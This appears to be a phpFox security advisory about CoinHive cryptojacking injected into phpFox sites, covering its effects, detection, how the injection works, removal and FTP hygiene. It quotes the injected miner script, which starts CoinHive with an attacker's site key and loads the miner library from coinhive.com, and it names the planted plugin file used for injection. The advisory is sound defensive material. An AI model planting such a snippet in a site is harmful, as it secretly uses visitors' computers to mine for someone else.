CryptoCurrency Miner Script
Nowadays you can hear people talk much about cryptocurrencies everyday. Cryptocurrency is a new trend now and indeed everybody wants to have a piece of this cake. This trend resulted in the emergence of online platforms that allow webmasters to install coin miners into their websites as an alternative means of monetization. Unfortunately, hackers can also abuse coin miner scripts by injecting them to websites without awareness of webmasters to get some benefits.
As reports and observations that we conducted recently, same as other popular platforms such as WordPress, Joomla, etc., phpFox is also a target for hackers. They have injected in many phpFox sites without any permissions of webmasters. Among them, CoinHive is exposed as the most spreading and popular script which enables hackers to hijack sites and drain the resources of users when they access to sites.
What is CoinHive?
CoinHive is one of the most popular JavaScript cryptocurrency miners for websites. According to CoinHive creator, it is a JavaScript miner for the Monero Blockchain that webmaster can embed into their websites. Users run the miner directly in their browsers and mine for the webmaster in turn for an ad-free experience, in-game currency…
Unfortunately, cybercriminals see this as an opportunity and have started abusing this tool by first hacking into websites and then embedding this JavaScript code into the core of popular platforms without the consent of site owner. Through this, hackers can use computers of site visitors to mine digital currency for them without users’ permissions.
In fact, CoinHive hijacking issue is becoming a security threat among popular Social Network and CMS platforms. Hackers target these platforms because sites using these platforms attract a large volume of users on a daily basis which is the best for coin mining purpose. There are records of sites using WordPress, Joomla, Magento, Drupal and many popular platforms as the victims of this kind of attack. Please refer to this article for more info. Certainly, our phpFox platform is not an exception to this plague.
What are impacts of injected CoinHive script?
By injecting CoinHive script into the core of the platform, the mining script will be called and run automatically by default when users load any page of the infected site. Once CoinHive script runs, resources on the computer of users will be hijacked and used as a coin miner. The script runs in background secretly so common users don’t even know the existence of the script to take actions.
Under the effect of CoinHive miner script, common symptoms which site visitors can easily notice are:
- High CPU and graphics cards usage.
- The computer works slowly on the browser and other programs.
- The computer will eventually stop working with high load.
How to detect websites using CoinHive script?
As mentioned above, the most obvious way to know if a site has CoinHive script running is to measure the performance of your computer. If you visit a site and realize your computer runs slower than usual, and there are no announcements of site owner about using CoinHive as an alternative revenue, please contact the site owner immediately. There is a high possibility that the site is already hijacked by hackers and running coin miner scripts.
On the phpFox platform, the quick and easy way to detect if CoinHive script is running is by pulling and examining the source of a page after logging in to the site (To view page source right-click on a page and select ‘View Page Source’).
You might see on page source something similar to:
<script>;$Ready(function() {setTimeout(function(){ var miner = new CoinHive.Anonymous('uoVwp8UScbNhkfzJn7rPNZFP3Pe1c54x');miner.start(); }, 10000);});</script>
Notice the site key as marked red, this is the key generated by hackers. Any coin mined will be transferred to hackers by using this key.
And:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
Those are indicators to show that a site is running CoinHive in the background.
There is an easy way to detect and prevent CoinHive from running and eating up all computer resources is by using coin mining script blocker extensions on browsers.
We suggest extensions such as:
J2TeaM Security
– Google Chrome: https://chrome.google.com/webstore/detail/j2team-security/hmlcjjclebjnfohgmgikjfnbmfkigocc/
No Coin
– Google Chrome: https://chrome.google.com/webstore/detail/no-coin-block-miners-on-t/gojamcfopckidlocpkbelmpjcgmbgjcl?hl=en
– Firefox: https://addons.mozilla.org/en-US/firefox/addon/no-coin/
How is CoinHive injected into phpFox?
Go in a little deeper, we figured when hackers have FTP access with the permission to modify files on phpFox site, they will insert this line to file:
…/PF.Base/include/library/phpfox/template/template.class.php
This will check for the existence of a plugin. if the plugin exists then the plugin will run and do something on the template. In this case, it is a plugin called template_getheader which is located at:
…/PF.Base/module/core/include/plugin/template_getheader.php
This file has simple content. It just plainly inserts the coin mining script to the header of phpFox main template file, so every page will load with the script embedded.
In other words, the flow of these actions basically is:
- User requests to load a page.
- Template file will be called to render the page.
- Injected code in template file will execute and call the malicious plugin.
- The plugin will inset coin mining script into the template file.
- From corrupted template file, the page will be rendered out with the coin mining script attached.
- User loads page and also runs the script.
Therefore, this is definitely NOT a security vulnerability in phpFox Script. Without FTP permission to access, create, upload or modify files, there is no way hackers can take advantage and penetrate scripts and files to the core of phpFox platform.
How to remove CoinHive script?
After testing the interactions of how hackers use the script on phpFox page, we suggest a simple solution to get rid of CoinHive script by removing malicious plugin file from the core of phpFox.
As mention above, the malicious added file is located in:
…/PF.Base/module/core/include/plugin/template_getXXXXX.php
With testing, we concluded that after removing this malicious plugin file, the template file will no longer generate coin mining script on the page and will render normally. So users will be safe to access your site.
Please note that the plugin file comes with many names, usually it in the format of template_getXXXXX.php such as template_getheader.php, template_gettemplate.php…
An easier way to know the file is by referencing the created/modified date of the file. It’s usually the most recent created/modified file in the folder.
However, this solution is suggested as just a temporary fix for an early stage of the investigation. We will conduct more research on the source and the origins to help you have better solutions. Anyway, any solutions won’t work unless you manage FTP access seriously and carefully.
How to prevent your site from injection of CoinHive script?
Currently, we know for sure that hackers are unable to inject the scripts to your site without FTP permission to access and manipulate files.
Therefore, manage FTP access seriously and carefully. Whenever you give FTP to any parties, you should create a separate account for each, so if any party creates/modifies anything on your site, their activities will be logged and you can reference or traceback in case anything happens. Make sure to enable FTP log and check the log on the date the malicious plugin file created, high chance you will know which party created/uploaded the file to your site. You will need to change the password of FTP accesses periodically or right after parties complete their works on your site.
Also, please be aware of any suspicious apps and modules. Make sure you purchase them from trustable developers/companies. If you think an app causes this issue, please don’t hesitate to contact phpFox team, we will review the app and take appropriate actions if needed. All bits of help is appreciated in the process.
Lastly, backup your site regularly. Notice changes on your site, if your site doesn’t work as usual (slower, sluggish…), please check for the interaction of coin mining script as mentioned above. In case of the issue is happening, revert back to the latest backup and trace what changes you made which might cause the issue (Installed an app, gave FTP to someone…)
Report Abuse to CoinHive team
Also, if you think a site is using CoinHive script without any notice of the usage to users, you can report CoinHive abuse here. Make sure you have the site key when reporting the abuse.
In any case, you can always contact us to seek assistance.